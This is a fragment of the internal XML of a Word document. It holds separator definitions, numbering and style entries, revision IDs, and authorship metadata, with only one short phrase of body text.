      <w:r w:rsidRPr="005409F1">
        <w:t xml:space="preserve"> output as evidence of analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A0498" w14:textId="77777777" w:rsidR="005409F1" w:rsidRPr="005409F1" w:rsidRDefault="005409F1" w:rsidP="005409F1"/>
    <w:sectPr w:rsidR="005409F1" w:rsidRPr="00540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11B7" w14:textId="77777777" w:rsidR="00FE40BD" w:rsidRDefault="00FE40BD" w:rsidP="009F235B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="246D4F36" w14:textId="77777777" w:rsidR="00FE40BD" w:rsidRDefault="00FE40BD" w:rsidP="009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0CBC" w14:textId="77777777" w:rsidR="00FE40BD" w:rsidRDefault="00FE40BD" w:rsidP="009F235B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="067E7269" w14:textId="77777777" w:rsidR="00FE40BD" w:rsidRDefault="00FE40BD" w:rsidP="009F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24451"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4FA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E52A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A02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568670">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="9346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40992"/>
    <w:rsid w:val="000E6BE2"/>
    <w:rsid w:val="00121D3D"/>
    <w:rsid w:val="002B23A0"/>
    <w:rsid w:val="0035023A"/>
    <w:rsid w:val="00365D7A"/>
    <w:rsid w:val="00453893"/>
    <w:rsid w:val="00455D3B"/>
    <w:rsid w:val="00460CC4"/>
    <w:rsid w:val="00496AB3"/>
    <w:rsid w:val="004A1F6F"/>
    <w:rsid w:val="00531A5F"/>
    <w:rsid w:val="005409F1"/>
    <w:rsid w:val="00587E9F"/>
    <w:rsid w:val="005C338D"/>
    <w:rsid w:val="0060191D"/>
    <w:rsid w:val="00610957"/>
    <w:rsid w:val="0063785B"/>
    <w:rsid w:val="00637DCA"/>
    <w:rsid w:val="006A49F4"/>
    <w:rsid w:val="007D0726"/>
    <w:rsid w:val="008A2D80"/>
    <w:rsid w:val="008E0A14"/>
    <w:rsid w:val="00960636"/>
    <w:rsid w:val="009A0F9E"/>
    <w:rsid w:val="009A3845"/>
    <w:rsid w:val="009C74C2"/>
    <w:rsid w:val="009F235B"/>
    <w:rsid w:val="00A17C28"/>
    <w:rsid w:val="00A46DAF"/>
    <w:rsid w:val="00A5156B"/>
    <w:rsid w:val="00A55C7C"/>
    <w:rsid w:val="00AC30E2"/>
    <w:rsid w:val="00B22E4E"/>
    <w:rsid w:val="00B55082"/>
    <w:rsid w:val="00BE16D3"/>
    <w:rsid w:val="00BF6FA1"/>
    <w:rsid w:val="00C0527C"/>
    <w:rsid w:val="00C242B1"/>
    <w:rsid w:val="00C3324B"/>
    <w:rsid w:val="00C72DCE"/>
    <w:rsid w:val="00C93184"/>
    <w:rsid w:val="00CE476B"/>
    <w:rsid w:val="00D71DC9"/>
    <w:rsid w:val="00DB0B15"/>
    <w:rsid w:val="00E06A21"/>
    <w:rsid w:val="00E30DC3"/>
    <w:rsid w:val="00F02B32"/>
    <w:rsid w:val="00FE1B27"/>
    <w:rsid w:val="00FE40B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D27"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0306C01-2806-49C5-A47D-920DFBA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9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2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02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02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B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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B88C-E500-4965-A6C8-F697562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a Imran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tauha Imran</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-24T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T09:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>